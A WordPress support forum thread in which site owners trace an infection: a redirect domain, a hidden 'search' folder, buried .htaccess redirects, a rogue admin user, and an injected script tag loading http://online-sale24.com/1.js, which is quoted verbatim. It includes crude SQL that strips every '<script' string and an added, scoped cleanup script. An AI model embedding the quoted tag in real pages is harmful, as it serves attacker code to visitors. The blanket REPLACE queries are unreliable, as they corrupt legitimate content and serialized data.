May be Malware attacks
-
http://googleframe.net/tijaq.cgi?18
This link opens when I click on the menu. Is there any quick solution to remove this?
-
Have you run a Complete Scan with my Anti-Malware plugin, and do you have the latest definition updates?
Yes, I did this and there is no malware detected, but I still get the same link when I open any menu.
This hack is something I have not seen before. It may be a new threat that has not yet been added to my definition updates. From your description it sounds like it is probably in your theme, maybe in the functions.php file.
If you can send me the infected file I can add it to my definition updates so that it can be automatically removed. If you want to zip up your whole theme and email it to me I can check it for you. You can email me directly: eli AT gotmls DOT net
Hello Eli
Thank you so much for your help
Actually I found it: one script, http://online-sale24.com/1.js, in all my pages and posts. They add it at the bottom of the page/post. So I just removed it and all is going well now, but I need to know whether they add this script to each page manually or whether they do some code and put it in some files? I think you get what I mean.
Thanks
Ahir Hemant
Hi all,
I faced the same problem as you all did. After hours and days of searching I found the source of this virus by myself, by mistake.
First, in the root of my website I found a folder called “search”.
It contains a folder called “cache” and a file called “search.php” and a .htaccess file.
Inside the cache folder of this search folder, there are 5 other folders called:
css
html
jpg
js
xml
Basically, the virus gets built out of this folder. I also found some redirects in my root’s .htaccess file, but very, very low down in the file. So search very carefully; it’s below what you can first see.
I will not post the contents of search.php as I don’t want to create any problems for this website.
So, I hope I helped you a bit and best regards to you all. Delete this “search” folder and the weird redirects in your .htaccess and everything should be fine. You could also check your theme’s header.php, just in case.
Best regards,
I have also found, inside Users in the WordPress admin, another user created by the virus:
Username: tEEebe777811, email: [email protected]
You should delete this user from the DB itself; it’s safer that way. Change your administrator password as soon as possible. Basically the virus could administrate your website as it pleased, as it had the administrator role inside the admin of your website.
I have also searched for “online-sale” inside my DB and I have found over 50 articles containing this script:
<script type='text/javascript' src='http://online-sale24.com/1.js'></script>
So you should check this too. This attack is far more complex than I thought.
I hope I helped you find a way to remove it.
Use SQL queries like this, replacing parts of this "<script type='text/javascript' src='http://online-sale24.com/1.js'></script>"
UPDATE wp_options SET option_value = replace(option_value, '<script', '') WHERE option_name = 'home' OR option_name = 'siteurl';
UPDATE wp_posts SET guid = replace(guid, '<script', '');
UPDATE wp_posts SET post_content = replace(post_content, '<script', '');
UPDATE wp_postmeta SET meta_value = replace(meta_value, '<script', '');
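The database cleanup described in the posts above, written as a scoped MySQL sequence that inventories, backs up, removes only the exact injected tag, and then lists administrator accounts for review. This is an added example, not code from any poster in this thread. It assumes the default wp_ table prefix and that the tag is stored with plain single quotes exactly as quoted above (copy the exact string from an affected row if it differs); the backup table name is made up for the example.

```sql
-- 1. Inventory first: see what is affected before changing anything.
SELECT ID, post_type, post_status, post_title
FROM wp_posts
WHERE post_content LIKE '%online-sale24.com/1.js%';

SELECT option_name
FROM wp_options
WHERE option_value LIKE '%online-sale24.com%';

SELECT post_id, meta_key
FROM wp_postmeta
WHERE meta_value LIKE '%online-sale24.com%';

-- 2. Keep a copy of every row the UPDATE will touch
--    (wp_posts_injected_backup is a hypothetical name).
CREATE TABLE wp_posts_injected_backup AS
SELECT * FROM wp_posts
WHERE post_content LIKE '%online-sale24.com/1.js%';

-- 3. Remove the whole injected tag, and only in rows that contain it.
--    Replacing just '<script' would leave the rest of the tag behind and
--    would also damage any legitimate script embedded in a post.
UPDATE wp_posts
SET post_content = REPLACE(
      post_content,
      '<script type=''text/javascript'' src=''http://online-sale24.com/1.js''></script>',
      '')
WHERE post_content LIKE '%online-sale24.com/1.js%';

-- 4. Verify: this should return 0. Rows still listed hold a variant of
--    the tag (different quotes or spacing) and need their own exact string.
SELECT COUNT(*) AS still_infected
FROM wp_posts
WHERE post_content LIKE '%online-sale24.com/1.js%';

-- 5. List every account holding the administrator role, newest first,
--    so an account nobody recognises stands out.
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.user_registered DESC;
```

Rows found in wp_options or wp_postmeta by step 1 are better fixed by hand: many of those values are PHP-serialized, and a REPLACE that changes the string length leaves the stored length prefix wrong, so WordPress can no longer read the value.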
@Sethos
Thanks for info
The topic ‘May be Malware attacks’ is closed to new replies.